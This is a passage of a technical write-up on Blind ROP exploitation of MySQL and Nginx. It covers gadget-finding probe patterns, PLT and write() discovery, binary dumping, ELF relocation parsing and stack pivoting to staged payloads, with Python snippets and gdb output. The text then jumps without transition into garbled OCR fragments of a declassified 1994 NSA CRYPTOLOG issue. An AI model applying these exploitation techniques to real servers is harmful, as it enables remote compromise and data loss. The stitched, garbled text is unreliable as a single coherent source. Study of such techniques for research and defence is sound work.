code pointers  when ASLR was enabled .  
I had to rework the patterns and implement a method  to find the return address with  much  higher 
accuracy. This resulted in a multi -step process.  
First, I had to make some changes to the  patterns , which can be seen below . 
if address < 0x400000: NOT RELEVANT  
if address > = 0x7fff00000000: NOT RELEVANT  
if address > 0x400000: MAYBE 
if (address & 0x7f0000000000) == 0x7f0000000000: MAYBE 
According to this, if we would like to eliminate values not relevant for us we can use the following 
simple pattern. If an address matches the pattern it is a return address candidate . 
if address > 0x400000 and address < 0x7fff00000000: RETADDR CANDIDATE  
The first step of the actual process was to read several values from the stack ( in my testing reading 
ten values was safe) and check each of them against  the pattern above. The values read from the 
stack when testing  Nginx, along with their position on the stack (starting from the very beginning of 
the buffer) can be seen below.  
ADDRESS                 STACK POS  
0x3539952936a15a00      513  
0xffffffffffffffffL     514  
0x7f28fa9df750          515  
0x7f28fa9ea0f4          516  
0xfefefefefefefefeL     517  
0xfefefe fefefefefeL     518  
0x7f28f9e894fe          519  
0xffffffffffffffffL     520  
0x7f28f9ebfbff          521  
0x7f28f9ecffff          522  
The canary has some properties which makes it easy to recognize above , especially if we take into 
consideration the context.  One of these properties obviously is its location on the stack. Another one 
is that i t seems to be random and does not look like a pointer. Also, the last byte of the canary is 
always 0x00.  For more information about stack canaries please refer to the Sta ckGuard paper 
mentioned earlier.  
Right after there is a non -relevant value followed by one which seems to look like  a return address. 
Trust me, it was not.  
After applying the  first step on the dumped values  I have received the following  reduced  list of return 
address candidates . 
STACK AFTER 1st STAGE CLEANUP (pattern)  
 
    ADDRESS           : STACK POS       CRASH  
    0x7f28fa9df750    : 515             0  
    0x7f28fa9ea0f4    : 516             0  
    0x7f28f9e894fe    : 519             0  
    0x7f28f9ebfbff    : 521             0  
    0x7f28f9ecffff    : 522             0  
  
 
 There were  still far too many return address candidates , though at least one of them is a return 
address. I have implemented a second stage check which actively measures the sensitivity of each 
value. This is done by adding  and subtracting values from the address and incrementing a crash  
counter  variable  by one for each c rash. This is because stack positions  which do not cause a crash 
whatever the value is will have a crash counter value of zero. Data pointers still can cause crash es 
but are generally less sensitive. Please note that it might be that data pointer tampering  results in 
more crashes. Such cases include  when the return address  is tampered wi th and  point s to a valid 
instruction (not misaligned) , and skipping  one or more instruction s will not result in a crash. According 
to what was written above, once the crash count is set for each stack item, the list of items should be 
ordered by the crash count in decrementing order. Items with a crash count of zero can safely be 
removed from the list.  This leaves  the following  smaller  list: 
STACK AFTER 2nd STAGE CLEANUP (cra sh_count)  
 
    ADDRESS           : STACK POS       CRASH  
    0x7f28f9e894fe    : 519             6  
    0x7f28f9ebfbff    : 521             3  
A third stage was also implemented for cases when the list after the second stage still contains both 
data and code pointers.  
The third stage builds on the idea that the data segment is usually at higher memory addresses than 
the code. One reason for this  is that if the code is buggy and there is a buffer overflow it will not be 
possible to overwrite code. The first step of the process is to get the smallest and biggest  addresses 
from our list, then calculate the distance between them. If we have more than  three  values remaining  
on our list  and the greatest distance is above 0x200000 (the 0x200000 distance is not fixed either and 
probably should not be considered as a general rule , but it worked in my testing ), indicating that both 
data and code pointers ar e present , only values which are closer to the smallest address should be 
kept in the list . This is because we assume (and this is the case most of the time as mentioned 
earlier) that data is located at higher memory addresses than code.  This stage will le ave us with a list 
free of data pointers.  
The fourth  stage is simple list ordering. First, we order the list based on the crash count, then, based 
on their position on the stack. As mentioned earlier , the most sensitive address is more likely to be a 
return address. At this stage we might still have multiple return address candidates even with the 
same crash count value. The value closer to the beginning of  the buffer is a better choice , as chances 
are that t he first return address is the one belonging to o ur stack frame.  
In my case the list resulting from the fourth stage was identical to the second stage shown earlier. 
And, indeed, the value  0x7f28f9e894fe  at stack position 519 was the return address.  
This process is not bulletproof, but still proved to be reliable in my testing of  multiple builds (PIE and 
Non-PIE builds with different optimisation levels) of both MySQL and Nginx.  
  
  
 Finding a STOP Gadget   
Finding a stop gadget is a straightforward process . However , using an infinite loop type of stop gadget 
for everything , especially in the case of Nginx , seems to be  a bad idea , as we will kill all the workers 
quickly.  
As the stop gadget is only used as a signalling mechanism, just as the  original  paper says, it can be 
anything which resul ts in a detectable signal. For example, writing on a socket, sleeping for an 
amount of time , or making the service continue to serve requests.  
The best STOP gadget searching idea  in the paper was to get the service to “jump” back into the 
main worker loop.  To do this we have to locate a gadget that simply returns ( return gadget ), or find  
the PLT, t ake a PLT entry that returns , and start padding the stack with the address of the return 
gadget or the PLT entry one stack position per iteration while inspecting  service behaviour. Once we 
pad the stack with the address of the PLT entry to reach the return address to the main worker loop 
the service sh ould resume serving requests.  
There are two problems with this. First, if we are looking for a return gadget , how do we know whether 
the address being probed actually points to a return gadget or not? The service will crash in both 
cases. Second, the process of finding the PLT might not require the use of a stop gadget if:  
 we are lucky enough not to hit an infinite lo op type of stop gadget before reaching the PLT  
 if we hit a PLT entry suitable to be used as a stop gadget (more about this later) we have to 
be lucky enough to have register value(s) which will make the PLT entry produce a detectable 
behaviour . 
Otherwise, the PLT detection pattern requires the use of a stop gadget:  without a stop gadget  we will 
not be able to craft working detection patterns.  
Even if we manage to find a return gadget, chances are high that  the idea of returning to the main 
worker  loop will  not work. For me, i n the worst cases the service ended up in an infinite loop ; most of 
the time it just crashed but u nfortunately never resumed serving requests. Also, the MySQL buffer did 
not allow for padding the stack to the main loop entry . This is because of how the buffer is handled 
(Figure 2).  
PLT entries such as usleep , nanosleep , write , and read could be used as stop gadgets  as 
suggested earlier . The problem is that without a BROP gadget or at least a POP RDI; RET  gadget 
this is, well, n ot really po ssible, except if we are lucky. Both in case of Nginx and MySQL I was not 
lucky enough to have a  suitable pre-populated  value in RDI (used to store the first argument to a 
function on x64) and  so I could not trigger a detectable pause when I hit usleep  or nanosleep  in 
the PLT . In one case only nanosleep  was available but the value in RDI was too small to be able to 
detect nanosleep , therefore it was not possible to use it as a stop gadget without finding a BROP 
gadget first. What this means is t hat at some point in the exploitation process, if we had to use an 
infinite type loop gadget, we can replace that with a safe version. This would be very useful in case of 
Nginx , but because of the use of the infinite loop type stop gadget we will probably  kill all the workers 
before getting there.  In the other case I had usleep  in the PLT but the value of RDI was 0x0.  
The problem was the same with the other PLT entries: the  registers  were not controllable at this point.  
This confirms what was written in the paper: better not to expect registers to have useful values.  
I had tried several things to avoid using a stop gadget that triggers an infinite loop  but none of them 
work ed. This meant that I would always exhaust all w orker threads of Nginx while trying to find the 
gadget. At this point I decided to shift focus primarily towards MySQL , hoping that if I made progress 
there the experience would help me come up with something that would help to make progress with 
Nginx .  
In case of MySQL I have used an infinite -loop type stop gadget because the service was forking 
threads and there was no hard  limit on the number of simultaneously running threads. Of course 
extensive use of this type of stop gadget can cause problems, for e xample eating up all sockets until 
no more connections are accepted. Because of this , I have implemented code to crash the whole 
process regularly , keeping the service accessi ble. 
  
 
 Finding a BROP Gadget   
To find a  BROP gadget , the original  paper suggests the use of the following stack pattern.   
probe, stop, stop, stop, stop, stop, stop, stop, traps  
The problem with the pattern above is that it will find any gadget that pops up 0 to 6 values. Using the 
stack pattern above results in the following issues:  
 The probe itself can point to an address where when the instructions get executed the service 
can go into an infinite loop. This is something I have encountered all the time while using the 
proof -of-concept code and with my own code (which used a better patt ern, more on this later) 
as well.  
 The above pattern will match all the gadgets in the list below , and any  gadgets that pop the 
6th value from the stack then return , or simply return to the address on the 7th stack position . 
From the list below o nly the la st one is good candidate of being a BROP gadget. But all share 
one thing in common: once hit they cause an infinite loop. During the scanning process we 
can easily kill all four workers of Nginx bef ore hitting a valid BROP gadget, unless  we are 
lucky enoug h to find a stop gadget which does not trigger an infinite loop.  
o RET 
o POP <REG>; RET  
o POP <REG>; POP <REG>; RET  
o POP <REG>; POP <REG>; POP <REG>; RET  
o POP <REG>; POP <REG>; POP <REG>; POP <REG>; RET  
o POP <REG>; POP <REG>; POP <REG>; POP <REG>; POP <REG>; RET  
o POP <REG>; POP <REG>; POP <REG>; POP <REG>; POP <REG>; POP <REG>; RET  
We cannot really avoid hitting an unwanted stop gadget with the probe, but we can avoid 
unnecessar ily hitting the stop gadgets we have put on the stack as part of the pattern.  
The pattern I was using to find a BROP gadget can be seen below.  
probe, trap, trap, trap, trap, trap, trap, stop   
The following list shows which gadgets the pattern  will match:  
 RET 
 POP <REG>; POP <REG>; POP <REG>; POP <REG>; POP <REG>; POP <REG>; RET  
The chances of hitting a stop gadget are greatly reduced using the new pattern. One thing to note 
though is that even if the probe itself will not point to a stop gadget and we hit the stop gadget we put 
on the stack, therefore a chain of instructions matching the pat tern was found ... yes, exactly. The 
pattern matches any chain of instructions which pops the 6th value from the stack the n returns , or 
simply returns to the address on the 7th stack position .  
To reduce false positives  the paper mentions the following  optim isation : 
 “A misaligned parse in the middle yields a pop rsp which will cause a crash and can be used to verify 
the gadget  and further eliminate false positives ” 
The problem is, a misaligned parse with the same offset in the chain of instructions matching the 
BROP pattern based on behaviour can cause a crash too.   
As an example I have set up a weak pattern as follows:  
if is_brop_gadget([probe, trap, trap, trap, trap, trap, trap, stop]) == 2 and \ 
    not is_brop_gadget([probe, trap, trap, trap, trap, trap, trap, trap]) and \ 
    not is_brop_gadget([probe + 3, trap, trap, trap, trap, stop]):  
               return probe  
The code above is supposed to return the address where a BROP gadget was found. T he arguments 
to the is_brop_gadget  function are the patterns. is_brop_gadget , which r eturns 2 (TIMEOUT) 
in case of an infinite loop, False if the service  crashed , and True if the payload did not cause a crash 
and the service is still running.  
  
 
 My code using  the patterns above reported the address 0x4e7a52 to be pointing to a BROP gadget. If 
we have a look at the code at the address we will immediately see that it is not what we were looking 
for. 
(gdb) x/16i 0x4e7a52  
   0x4e7a52 <ftell@plt+2>:      xor    %dh ,%dh 
   0x4e7a54 <ftell@plt+4>:      jo     0x4e7a56 <ftell@plt+6>  
   0x4e7a56 <ftell@plt+6>:      pushq  $0xe  
   0x4e7a5b <ftell@plt+11>:     jmpq   0x4e7960  
   0x4e7a60 <shutdown@plt>:     jmpq   *0x70f62a(%rip)        # 0xbf7090 
<shutdown@got.plt>  
   0x4e7a66 <shutdown@plt+6>:   pushq  $0xf  
   0x4e7a6b <shutdown@plt+11>:  jmpq   0x4e7960  
   0x4e7a70 <__strncpy_chk@plt>:        jmpq   *0x70f622(%rip)        # 0xbf7098 
<__strncpy_chk@got.plt>  
   0x4e7a76 <__strncpy_chk@plt+6>:      pushq  $0x10  
   0x4e7a7b  <__strncpy_chk@plt+11>:     jmpq   0x4e7960  
   0x4e7a80 <close@plt>:        jmpq   *0x70f61a(%rip)        # 0xbf70a0 
<close@got.plt>  
   0x4e7a86 <close@plt+6>:      pushq  $0x11  
   0x4e7a8b <close@plt+11>:     jmpq   0x4e7960  
   0x4e7a90 <ceil@plt> : jmpq   *0x70f612(%rip)        # 0xbf70a8 <ceil@got.plt>  
   0x4e7a96 <ceil@plt+6>:       pushq  $0x12  
   0x4e7a9b <ceil@plt+11>:      jmpq   0x4e7960  
  
The BROP gadget detection mechanism I have implemented can be seen below.  
 
 
 The process is made up of two stages. The first stage determines whether the address pointed to by 
our probe has the BROP gadget behaviour. This is done using  the following two patterns:  
 probe, trap, trap, trap, trap, trap, trap, stop   
This pattern is used to find code which behaves like a BROP gadget.  
 probe, trap, trap, trap, trap, trap, trap, trap 
This pattern  is used to detect whether the probe itself points to a stop gadget or the stop 
gadget hit is the one we have put on the stack. This is because if it was our stop gadge t that  
hit when using the first pattern, replacing the stop gadget with a trap should result in a crash.  
The problem obviously is  if that it was the probe acting as a stop gadget, in case of Nginx, we have 
killed yet another worker.  
Anyway, let’s have a l ook at the second stage of the process , which is intended to reduce false 
positives in a more reliable way. The following patterns were used:  
 probe  + 4, trap, trap, trap, stop   
If a BROP gadget was hit and we add four to the probed address, only three values should be 
popped from the stack. We can confirm this by having a  look at the BROP gadget below . 
5b              pop    %rbx  
5d              pop    %rbp  
41 5c           pop    %r12  
41 5d           pop    %r13     < PROBE + 4  
41 5e           pop    %r14  
41 5f           pop    %r15  
                ret 
 Probe  + 4, trap, trap, trap, trap 
This pattern is used to detect whether it was ou r stop gadget hit or the service ended up in an 
infinite loop, which might happen if the new probe address (+4) triggers an infi nite loop.  
 
If all of these patterns are matched we can be pretty confident that a BROP gadget was found . Of 
course this method has several downsides , such as the increased request (therefor e crash) count and 
the increase in  time required  to find the gadge t, as scanning is don e one byte a time , while it still can 
happen that unwanted stop gadgets get hit.  
Just for the sake of completeness , below is the pattern my code was using to find a BROP gadget.  
if is_brop_gadget([probe, stop]) != 2 and \ 
   is_brop_ga dget([probe, trap]) == False and \ 
   is_brop_gadget([probe, trap, trap, trap, trap, trap, trap, stop]) == 2 and \ 
   is_brop_gadget([probe, trap, trap, trap, trap, trap, trap, trap]) == False and 
\ 
   is_brop_gadget([probe + 4, trap, trap, trap, stop]) ==  2 and \ 
   is_brop_gadget([probe + 4, trap, trap, trap, trap]) == False and \ 
   is_brop_gadget([probe + 3, trap, trap, trap, trap, stop]) == False:  
    return probe  
As can be seen , I added the check for the POP RSP crash as the last pattern.  Of course the more 
patterns we use , the longer the process will take and the noisier the attack gets . The exploit using the 
patterns above reported the address as point ing to 0x4e8b19. Having a look at the address with a 
debugger , we can confirm that the address indeed points to a BROP gadget.  
(gdb) x/7i 0x4e8b19  
   0x4e8b19 <_ZL17fix_type_pointersPPPKcP10st_typelibjPPc.constprop.75+132>:    
pop    %rbx  
   0x4e8b1a <_ZL17fix_type_pointersPPPKcP10st_typelibjPPc.constprop.75+133>:    
pop    %rbp  
  
 
    0x4e8b1b <_ZL17fix_type_pointersPPPKcP10st_typelibjPPc.constprop.75+134>:    
pop    %r12  
   0x4e8b1d <_ZL17fix_type_pointersPPPKcP10st_typelibjPPc.constprop.75+136>:    
pop    %r13  
   0x4e8b1f < _ZL17fix_type_pointersPPPKcP10st_typelibjPPc.constprop.75+138>:    
pop    %r14  
   0x4e8b21 <_ZL17fix_type_pointersPPPKcP10st_typelibjPPc.constprop.75+140>:    
pop    %r15  
   0x4e8b23 <_ZL17fix_type_pointersPPPKcP10st_typelibjPPc.constprop.75+142>:    
retq 
Unfortunately, in case of Nginx all methods ended up rendering all the workers into an infinite loop. 
Even using the original pattern and skipping seven bytes per iteration while scanning resulted in 
hitting way too many unwanted stop gadgets. With MySQL , however,  the method I hav e implemented 
was working fine.  
Finding the Procedure Linkage Table  
There can be multiple complications during the PLT lookup process. The very first issue I have found, 
again, relates to the detection pattern s. According to the original paper one should use the probe, 
stop, trap pattern to check whether the stop gadget was hit and if it was hit, check probe+6, stop, trap. 
If both pattern s match, one should check if the neighbouring entries behave the same way. If they do, 
the PLT was found. In my case there was plenty of code between the PLT and the  ELF header , and 
unfortunately multiple addresses behaved as a stop gadget. The situation got even worse when the 
service was compiled with PIE , as the scanning is done towards lower mem ory addresses, meaning 
higher chances to hit stop gadgets.  
I have used the following patterns to find the PLT : 
        if is_PLT(probe) and \ 
           is_PLT(probe + 6) and \ 
           is_PLT(probe + 16) and \ 
           is_PLT(probe + 32) and \ 
           is_PLT(probe + 38):  
            return True  
In general, the more checks we perform , the better our chances are to find the PLT. I have found 
code at several locations which matched the patterns probe, probe+6, probe+16 and probe+32  and 
only when probe +38 was added did it turn out that I was not  looking at a PLT entry.  As each of these 
checks involved the use of a stop gadget , false positive s may render  all the workers of Nginx into an 
infinite loop. Fortunately the PLT lookup was working fine with MySQL.  
Dealing with the PLT  
Using the PLT can have unexpected consequences. A very obvious and fatal one will be mentioned 
here. Another, related to locating write()  will be explained later.  
It happened that while scanning the PLT for a specific PLT entry I hit exit() . While this would have 
not been  a problem with Nginx (if I ever get to this point) , as the main process would fire up a new 
worker, in case of My SQL this resulted in a complete shutdown.  
Obviously in case of MySQL this means the exploitation has failed and we have to wait until someone 
restarts the service. Next time we had better  start scanning the PLT from the end of it.  
Finding write()  
Finding write()  is a bit more problematic than locating strcmp() . First, in case of MySQL the 
buffer size was too small  to hold the payload  I planned to use . Second, after overcoming th e buffer 
size limitation, write()  corrupted the binary log files which resulted  in a complete service shutdown.  
  
 
 Extending the Buffer  
To make our ROP chain  fit in the buffer , we can try to further optimise the payload. Even if the 
payload is heavily optimised, it is still possible  that it will not fit in the buffer.  
If we take a look at Figure 2 , again we will see 
that it should be  possible to get some more 
bytes for our ROP payload. It should be possible 
to make function C overwrite function B’s return 
address,  or its own.  
For this the previously controlled return address 
on the picture on the right had to be replaced 
with a trap, then the buffer had to be overflown 
further with stop gadgets. Once the return 
address of function B or function C got 
overwritten with the stop gadget , the service 
went into an infinite loop.  
 
Why wasn't this the first return address to be found?  
 In general this can happen either because the code probing for the buffer size started the 
overflow with a shorter value  and incremented the overflow string until the first crash, which 
marked  the first co ntrollable return address , or because  the code started between the two 
return addresses and as the first was overwritten with garbage, there was a crash, so the 
code started to decrement the size of the buffer to find where the return address start ed.  
 In this specific case , if I set the overflow string to be really long I have overwritten all return 
addresses with junk and there is no way (remotely, with a blind attack) to figure out which 
function crashed. This is why the use of a stop gadget was required , as using it made it 
possible  to check whether a value further down the stack could be a controllable return 
address.  
Issues with Detection  
Once we have a big enough buffer space to inject the write()  lookup ROP chain , we can start 
brute -forcing the locat ion of write() . It turned out this process is not completely reliable either , as 
both pwrite() , which was found first, and write()  completely crashed MySQL and, as the binary 
log files got corrupted , it prevented restarting MySQL. The problem was that one of the probed file 
descriptor s was the file descriptor of the binary log.  
As stdin, stdout , and stderr are a no -go by default (descriptors 0, 1, 2) , chances are that the next few 
descriptors are related to files MySQL working with. What we can do is to sta rt with a higher number 
when brute -forcing the socket ID. The question is: where should we start brute -forcing from to avoid 
corrupting the binary logs but not to miss the right socket descriptor? Maybe this is one of the reasons 
the original BROP code ope ned so many connections to the target: to be able to start with a bigger 
socket ID and not to miss the correct one (s). 
The other problem was that pwrite()  was hit first: pwrite()  has four arguments , and the last one 
is offset  which we cannot control. The register RCX holding the value of the fourth argument can hold 
a value which might trigger an error , and as a result pwrite()  will never return anything on the 
socket. We can expect the following problems with pwrite() , accord ing to the manual page :  
 "The file referenced by fd must be capable of seeking."  
A socket is not capable of seeking.  
 
 “pwrite () can fail and set errno  to any error specified for write()  or lseek().”  

  
 If we have a look at the manual of lseek() we will see that lseek(), and therefore pwrite() , can 
fail with ENXIO, which means the file offset is beyond the end of the file.  
The solution was the same as in case of the strcmp()  lookup: scanning the PLT starting from the 
end. As we are now  able to issue a write()  call using the MySQL socket connection, it becomes  
possible to leak data from arbitrary addresses from the service.  
Crafting the Final Payload  
Once we are ready to dump the in -memory image of the binary , we can either extract useful 
information on  the fly or dump the binary and parse it later. We can extract all the information required 
to create our final payload. I decided to dump a big part of the binary first.  
Just as a side -note: At this point we are basically done with the “Blind” part of the ROP exploitation 
process. At first I thought from this point forward everything would  be easy , but it turned out to be 
quite challenging and interesting , so I decided to write about these things as well.  
Dumping the binary made  finding ROP gadgets such as POP <REG>; RET  trivial. One thing to note 
here is that the dumped binary is not identical to the original file before it got loaded into the memory. 
The section header , for example , is missing. This means  that some ROP gadget finder tools might not 
be able to work with the dump file. This was the case , for example , with Ropper.  
By enumerating the PLT entries and their relocation offsets it becomes possible to call any of the 
functions. But why would we bother enumerating PLT instead of finding a syscall  gadget ? One of 
the reasons is that when I have tried to look for a syscall  gadget, I could not find any which would 
not result in a crash.  This does not mean we cannot use it. It means we can use it only once.  
The question is , how i s it possible to figure out th e relocation offset of the PLT entries , and how do we 
get their matching symbol names?  
Finding the String Table  
Fortunately there is not much explanation needed here. A string table is an array of null terminated 
strings. What we have to know is that the f irst byte of the string table is a NULL byte. Therefore, the 
string table starts with that initial null byte. This is important as all the offsets in the symbol table point  
to strings relative to this location. We start searching from the beginning of the dump until a list of 
strings is found. The following regexp code (Python) can be used to check for a match.  
m = re.search(" \0" + ("[0 -9a-zA-Z\@\_\-\.]{1,512} \0" * 4), self.s) # self.s is 
mmap'ed dump file  
 Finding the Symbol Table  
To be able to prepare a good pattern, first we have to have a look at the  structure of the symbol table. 
This can be seen below.  
    typedef struct  
    { 
        Elf64_Word       st_name;     /* 4 bytes offset - symbol name */  
        unsigned char    st_info;     /* 1 byte - type and Binding attributes */  
        unsigned char    st_other;    /* 1 byte - reserved */  
        Elf64_Half       st_shndx;    /* 2 bytes - section table index */  
        Elf64_Addr       st_value;    /* 8 bytes - symbol value */  
        Elf64_Xword      st_size;     /* 8 bytes - size of object (e.g., common) 
*/ 
    } Elf64_Sym;  
  
 
 Based on the above we know that a symbol table entry is twenty -four bytes long. What we additionally 
have to know is that the first symbol table entry is reserved and must be all zeroes. The symbolic 
constant STN_UNDEF  is used to refer to this entry.  
What I have implemented is extremely simple and assumes the symbol table follows the string table. I 
scan from the string table towards higher offsets until twenty -four bytes of 0x00 is found. While this 
works fine for me , one might extend the lookup pattern by looking for specific st_info  field values 
(type and binding attributes) to reduce false positives.  
Finding the Relocation Table  
To be able to prepare a good pattern, first we h ave to have a look at the structure of the relocation 
table. This can be seen below.  
    typedef struct  
    { 
        Elf64_Addr     r_offset;   /* Address of reference */  
        Elf64_Xword    r_info;     /* Symbol index and type of relocation */  
        Elf64_Sxword   r_addend;   /* Constant part of expression */  
    } Elf64_Rela;  
An entry in the re location table is twenty -four bytes long . The r_info  field holds the symbol index 
and the type of the relocation , and is of use to us . The relocation types f or x64 can be seen below. 
(Taken  from /usr/src/linux -headers-3.16.0-30/arch/x86/include/asm/elf.h )  
    /* x86-64 relocation types */  
    #define R_X86_64_NONE           0       /* No reloc */  
    #define R_X86_64_64             1       /* Direct 64 bit  */  
    #define R_X86_64_PC32           2       /* PC relative 32 bit signed */  
    #define R_X86_64_GOT32          3       /* 32 bit GOT entry */  
    #define R_X86_64_PLT32          4       /* 3 2 bit PLT address */  
    #define R_X86_64_COPY           5       /* Copy symbol at runtime */  
    #define R_X86_64_GLOB_DAT       6       /* Create GOT entry */  
    #define R_X86_64_JUMP_SLOT      7       /* Create PLT entry */  
    #define R_X86_64_RELATIV E       8       /* Adjust by program base */  
    #define R_X86_64_GOTPCREL       9       /* 32 bit signed pc relative  
                                               offset to GOT */  
    #define R_X86_64_32             10      /* Direct 32 bit zero extended  */ 
    #define R_X86_64_32S            11      /* Direct 32 bit sign extended */  
    #define R_X86_64_16             12      /* Direct 16 bit zero extended */  
    #define R_X86_64_PC16           13      /* 16 bit sign extended pc relative */  
    #define R _X86_64_8              14      /* Direct 8 bit sign extended  */  
    #define R_X86_64_PC8            15      /* 8 bit sign extended pc relative */  
    #define R_X86_64_NUM            16  
We are interested in the R_X86_64_JUMP_SLOT  relocation type (there is a reason why I marked the 
R_X86_64_COPY  relocation type , but more on this later ). So we can start scanning from the string 
table towards higher offsets to find a twenty -four byte entry where the  extracted and parsed  r_info  
field will yield this relocation type. Additionally, r_addend  would be 0x00 should we also check for 
this.  
The following Python snippet shows this:  
  
 
     entry    = self.f.read(24)  
    r_info_type = struct.unpack("<I", entry[8:12])[0]  
    r_addend = struct.unpac k("<Q", entry[16:24])[0]  
    if r_info_type == 0x7 and r_addend == 0x0: return True  
Parsing the Relocation Table  
The following picture explains how to parse the relocation table, look up the symbol table entry 
belonging to the relocation , and then read the  name of the symbol from the string table.  
 
Once we have the symbol -name - relocation pairs we will know which relocation offset belongs to the 
functions. We can use the relocation offsets to call the functions from the PLT using the PLT gadget 
found earlier.  
And now comes the interesting part: I h ad trouble resolving symbol names of the relocations properly. 
Related document s only mention that the relocation offset extracted from r_info  using the 
ELF64_R_SYM  macro points to a symbol entry in the symbol table. For example  R_SYM  3 points to the 
third item in the symbol table. But w hen I tried to map the relocation table entries to the symbol table 
entries based on the extracted symbol index I got incorrect results. I spotted this  because I had 
several reference points within the PLT such as strncmp( ) and write()  with the correct relocation 
offsets obtained by brute -forcing the PLT earlier.  
As the relocation table did not reference symbol entry #0 and the first relocation entry referenced #1, 
it turned out that I ha ve to subtract 1 from the R_SYM . I also found that sometimes a relocation entry is 
“missing ” from the table , as for example  an entry with relocation offset 0x21 was followed by 0x23.  It 
turned out that  if a relocation offset is “missing ”, the next one should  be moved into its place and it s 
reloc ation  offset should be updated , but the symbol table lookup should still point to the correct value 
as it seems to be independent from the reloc ation  table issues.  This manifested the following ugly 
Python solution.  
    r_sym = (r_info >> 32) - 1 
    if r_sym  != CNT: 

  
         r_sym -= 1 
        s_sym = self.sym_lookup(r_sym + 1)  
        if r_sym > CNT + 1: r_sym = CNT  
    else: 
        s_sym = self.sym_lookup(r_sym)  
Please note that the CNT variable above was used to keep track of the real index of the relocations in 
the relocation table.  
At this point we can call any function from the PLT and extract useful gadgets from the binary. Next, 
we have  to deal with the small buffer which is not bi g enough to hold a complex payload , as 
mentioned earlier in the MySQL case.  
Extending the Buffer, Again  
Depending on the size of the buffer we have several options, which include :  
 Using a SUB ESP,  ???; RET  gadget to extend the stack area and align our pay load in a 
way that , as a result of the gadget RSP, will point to our ROP chain.  
 Use mmap()  to map an executable region with PROT_EXEC  flag, call read()  to read a 
seco nd-stage payload (does not have to be a ROP chain) to the area , and get it executed. 
Witho ut PROT_EXEC , RSP has to be set to the mapped are and a ROP chain has to be used.  
In case of MySQL , the stack redirection approach was followed with some important difference s, 
because calling mmap()  itself would not have fit on the stack. I had no suitable SUB ESP,  ???; 
RET gadget anywhere. Neither ADD ESP  with a negative value. BUT, I had a relocation table.  
The idea was to find an entry in the relocation table with the type R_X86_64_COPY . The link editor 
creates this relocation type for dynamic linking. Its offset member refers to a location in a writable 
segment. During execution, the dynamic linker copies data associated with the shared object’s 
symbol to the location specified by the o ffset. Once the entry found the r_offset  value, which points 
to writable memory area , it can be unpacked, aligned by subtracting the payload size from it (e.g. 
0x800) which would allow 2048 bytes, a total of 256 entries on the stack to be used for a seco nd 
stage ROP chain. Later, an ROP chain can be created which uses write  to write data read from the 
socket into the memory area.  As the last step, the stack pointer can be redirected using a POP RSP; 
RET instruction.  
I have used this newly “allocated” area to host a ROP payload which maps an executable memory 
region and reads a third-stage payload into it, then passes execution to it.  
Conclusions and Summary  
BROP is a really  time-consuming exploitation technique. From my experience, i t works much better in 
theory than in practice. Successful exploitation depends on several factors, such as when, by what 
compiler , and how , the target application was compiled, what protections were applied, how the 
application works, how robust the error handling implemented is , how it behaves when  a thread or 
worker crashes, luck , and so on.  
Still, BROP is something extremely fun and challenging to play with. I hope you enjoyed reading this 
post as much as I enjoyed writing the exploit.  
 
 D~89
ThisIssue:1aAPRID'4
NATIONAL SECURITY AGENCY
CRYPTOLOG
TheDirector's Summer Program
TheClosingofNSGAPhilippines
AnAgnostic LookatTaMPage2
Page9
.
Page20
....ANDMORE(TableofContents, pagei)
Declassified andApproved forReleasebyNSAon'10-'10-.20'1.2 pursuanttoE.O.'135.26.
vlDRCase#54778
€Ias.liedh,~iSh1eSSM 1~a
Bt:eIassify Oil.81iginating AlEne, '1'1
;geteRRiBati8llRettttireli'l'IHSBOCUM£N'I' CON'l'A:INS
COQ~¥/ORB Mh'l'ERlhL
TOPSECRET

DOCID: 4009689
CRYPTOLOG
Vol.xxNo.1 1stIssue1994
Published byPOS.Operations Directorate Intelligence Staff
Publisher 1 ---'
Editor 1 ---l1(963-7
Collection MarianBrown (fJ6:j~
Cryptanalysis 1 (963;
Cryptolinguistics 1 (963; 2)
Information Resources..................................................................... J 96-3;i3i58)
Information Science .1 9(j3E:3i456)
Information Security 1 968;L&,013)
Intelligence Community .J (96'3.5800)
Language , 1 (9(53#3057)
Linguistics 1 (9;63P4814)
Mathematics 1 (96tNL3709)
Puzzles .1 tfJ63-1461)
Research andEngineering ..1 1t'9~1-8362)
ScienceandTechnology ~ 1(963-3544)
SpecialResearch VeraR.Filby(968-6558)
TrafficAnalysis JJ(963-3369)
Classification Officer 1L...-r- (963-5463)
UnixSupport 1 (963-3369)
Macintosh Support .1 "961-8362)
................................................................................................................... 1 963-4382)
Contents ofCRYPTOLOG maynotbereproduced ordisseminated outsidetheNational
SecurityAgencywithoutthepermission ofthePublisher. Inquiries regarding reproduction
anddissemination shouldbedirectedtotheEditor.
Allopinionsexpressed inCRYPTOLOG arethoseoftheauthors. Theydonotrepresent the
officialviewsoftheNationalSecurity Agency/Central SecurityService.
Tosubmitarticlesandletters.pleaseseelastpage
1P.L.86-36

DOCID: 4009689
TableofContents
TheDirector's Summer Program 1
OpenSystems: WhatDoesItMean? .4
TheCIMTRMandtheNSAProfile 6
TheClosingofNSGAPhilippines 9
Eurocrypt '92Reviewed 12
AnAgnostic LookatTQM 20
Technical Literature Report 23.
Principles forSuccessful Guidance 24
Lexicography atSecondHand:
Producing an"ExoticLanguage" Glossary 25
BookReview: English-Arabic Scientific &Technical Dictionary 26
LetterstotheEditor ,'"27
11

DOCID: 4009689'FOPSECRET UM:BRI ...
CRYPTOLOG
March 1994
TheDirector's Summer ProgramP.L.86-36
IR51
R51 L...- _
t€tMathematics isthefundamental sciencethatsupports thetwindisciplines ofcryptology: thedesignof
encipherment systems, andcryptanalysis, the"breaking" ofcodesintended tobeunbreakable. Theever­
increasing mathematical sophistication ofcryptographers andcryptanalysts outsideNSA,theincreasing number
ofimportant cryptologic problems. andtheincreasing complexities posedbymodern modems and
communications systemsrequiresus,morethanever,tobringthenewestandmostpowerful ideasinmathematics
tobearonourproblems.
(U)Forthepastfoursummers, theR51-sponsored Director's SummerProgram (DSP)hasinvitedexceptionally
talentedyoungmathematicians fromacrossthenationtoNSAforupto12weeksandexposed themtothe
excitement ofcryptologic mathematics bygivingthemhands-on experience workingonsomeofourmostdifficult
andimportant cryptologic problems underthedirection oftopAgencymathematicians. Theprogram hasbeen
enormously successful initsfirstfouryears(1990-1993), obtaining surprisingly effectiveoperational solutions to
veryhardproblems, encouraging participants tocontinue theirstudyofmathematics, andhelpingNSAtobecome
betterknownintheactivenetworkofoutstanding youngmathematicians.
(U)Entryintothisprogram ideallywilltakeplacebetween thejuniorandseniorundergraduate years,but
